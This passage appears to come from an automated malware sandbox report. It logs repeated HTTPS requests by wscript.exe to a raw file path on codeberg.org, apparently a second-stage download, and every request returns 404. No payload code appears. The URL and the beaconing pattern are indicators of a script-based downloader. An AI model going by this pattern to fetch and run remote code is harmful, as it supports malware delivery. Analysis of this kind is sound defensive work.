                    2024-04-09 15:56:01 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:01 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:01 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:01 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.749704217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:05 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:05 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:05 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:05 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.749711217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:07 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:08 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:08 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:08 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.749712217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:10 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:10 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:10 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:10 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.749713217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:13 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:13 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:13 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:13 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.749714217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:16 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:16 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:16 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:16 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.749715217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:18 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:19 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:19 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:19 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.749716217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:21 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:21 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:21 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:21 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.749717217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:25 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:25 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:25 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:25 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.749718217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:28 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:28 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:28 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:28 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.749719217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:30 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:31 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:31 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:31 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.749720217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:33 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:33 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:33 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:33 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.749721217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:36 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:36 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:36 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:36 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.749722217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:39 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:39 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:39 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:39 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.749723217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:43 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:43 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:43 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:43 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.749727217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:46 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:46 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:46 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:46 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.749728217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:48 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:49 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:49 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:49 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.749729217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:51 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:51 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:51 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:51 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.749730217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:54 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:54 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:54 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:54 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.749731217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:56:58 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:56:58 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:56:58 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:56:58 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.749732217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:57:01 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:57:01 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:57:01 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:57:01 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.749733217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:57:03 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
